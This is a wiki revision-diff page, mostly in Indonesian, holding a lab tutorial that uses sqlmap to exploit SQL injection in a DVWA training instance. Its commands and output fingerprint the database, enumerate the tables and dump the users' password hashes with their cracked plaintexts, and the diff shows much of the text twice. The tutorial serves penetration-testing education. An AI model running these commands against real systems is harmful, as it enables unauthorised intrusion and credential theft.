Difference between revisions of "DVWA: Exploit menggunakan sqlmap"

From OnnoWiki
Jump to navigation Jump to search
Line 5: Line 5:
 
  http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#
 
  http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#
  
Enumerating database (-f)
+
==Enumerating database (-f)==
  
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f  
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f  
Line 19: Line 19:
  
  
Fingerprinting database (-b)
+
==Fingerprinting database (-b)==
  
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b
Line 32: Line 32:
 
  banner:    '5.7.11-0ubuntu6'
 
  banner:    '5.7.11-0ubuntu6'
  
List databases (--dbs)
+
==List databases (--dbs)==
  
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs
Line 51: Line 51:
  
  
Cek tables di sebuah Database (-D namadatabase --tables)
+
==Cek tables di Database (-D namadatabase --tables)==
  
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables
 
  sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables
Line 69: Line 69:
 
  +-----------+
 
  +-----------+
  
 +
==Lihat struktur data sebuah tabel (-T namatabel --columns)==
  
 +
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns
  
 +
Hasilnya kira-kira
  
Command:
+
[09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa'
 +
Database: dvwa
 +
Table: users
 +
[8 columns]
 +
+--------------+-------------+
 +
| Column      | Type        |
 +
+--------------+-------------+
 +
| user        | varchar(15) |
 +
| avatar      | varchar(70) |
 +
| failed_login | int(3)      |
 +
| first_name  | varchar(15) |
 +
| last_login  | timestamp  |
 +
| last_name    | varchar(15) |
 +
| password    | varchar(32) |
 +
| user_id      | int(6)      |
 +
+--------------+-------------+
  
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –current-user –is-dba –current-db –hostname
+
==Dump Password (-C password --dump)==
  
Obtaining the current user,current db,hostname and if the current user is dba
+
sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump
  
 
  
As we can see from the image above we have obtained successfully the information that we asked.Now we need to find the users and their password hashes as well as and their privileges and roles that they have on the database.This is very important because we can use this kind of information to access the database directly in case that we can crack the hashes.SQLMap provides this functionality as well but in our case SQLMap discovered that for the accounts root,guest and debian-sys-maint no password has set and the root account has administrative privileges.
+
Hasilnya kira-kira,
  
Command:
 
 
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –users –passwords –privileges –roles
 
 
Discover database users and hashes
 
 
 
 
Discover Privileges and Roles
 
 
 
 
At this point we can say that the database is ours as we have all the database accounts in our disposal and the knowledge that these accounts are running with DBA privileges.However we would like also to own and the application so now we will focus on that.In order to achieve this we will need to extract data from the dvwa database.The sqlmap with the –tables parameter can enumerate the tables of all the databases that exist.
 
 
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
 
–cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –tables
 
 
Database tables
 
 
 
 
The dvwa database as we can see from the above output has only two tables:the guestbook and the users.We will try to enumerate the columns of these tables with the parameter –columns in the sqlmap.
 
 
Command:
 
 
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
 
–cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –columns
 
 
Obtaining the columns
 
 
 
 
The interesting table is the users because as we can see from the screenshot it has a column with the name password which may contain password hashes or even better passwords in clear text format.So lets see what kind of data the columns of these two tables are containing.
 
 
Command:
 
 
./sqlmap.py -u “http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=46c8d37dccf4de6bf8977516f4dc66e0; security=low” –dump
 
 
Guestbook – Tables Entries
 
  
 +
Database: dvwa
 +
Table: users
 +
[5 entries]
 +
+---------------------------------------------+
 +
| password                                    |
 +
+---------------------------------------------+
 +
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
 +
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
 +
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
 +
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
 +
| e99a18c428cb38d5f260853678922e03 (abc123)  |
 +
+---------------------------------------------+
 
   
 
   
 +
[09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv'
  
Cracking hashes in table users
 
 
 
  
 
As we can see from the image above sqlmap discovered password hashes on the column password and cracked them successfully by using a dictionary attack.Now we have and the passwords along with the usernames of the DVWA users which means that the database and the application have been compromised completely.
 
As we can see from the image above sqlmap discovered password hashes on the column password and cracked them successfully by using a dictionary attack.Now we have and the passwords along with the usernames of the DVWA users which means that the database and the application have been compromised completely.

Revision as of 09:57, 3 May 2017

Sumber: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/

URL DVWA yang di serang

http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#

Enumerating database (-f)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f 

Hasilnya kira-kira

[09:38:21] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               comment injection fingerprint: MySQL 5.7.11
               html error message fingerprint: MySQL


Fingerprinting database (-b)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b

Hasilnya kira-kira

[09:41:30] [WARNING] reflective value(s) found and filtering out
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner:    '5.7.11-0ubuntu6'

List databases (--dbs)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs

Hasilnya kira-kira

[09:48:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[09:48:29] [INFO] fetching database names
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys


Cek tables di Database (-D namadatabase --tables)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables

Hasilnya kira-kira

09:50:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[09:50:45] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Lihat struktur data sebuah tabel (-T namatabel --columns)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns

Hasilnya kira-kira

[09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

Dump Password (-C password --dump)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump


Hasilnya kira-kira,


Database: dvwa
Table: users
[5 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
+---------------------------------------------+

[09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv'


As we can see from the image above sqlmap discovered password hashes on the column password and cracked them successfully by using a dictionary attack.Now we have and the passwords along with the usernames of the DVWA users which means that the database and the application have been compromised completely.

Conclusion

In this tutorial we saw how effective is the sqlmap tool when we have to identify and exploit SQL injection vulnerabilities.Of course the proper way to exploit the SQL Injection vulnerability is manually.However in many penetration tests due to time constraints the use of sqlmap is necessary.

Specifically in this case sqlmap managed to enumerate the database successfully and to extract data from the database tables very fast.Of course it has many more capabilities like that it can check for the existence of WAF (Web Application Firewall),IDS and IPS as well as that it can execute operating systems commands.For all these reasons this tool must be in the toolkit of every penetration tester.


Referensi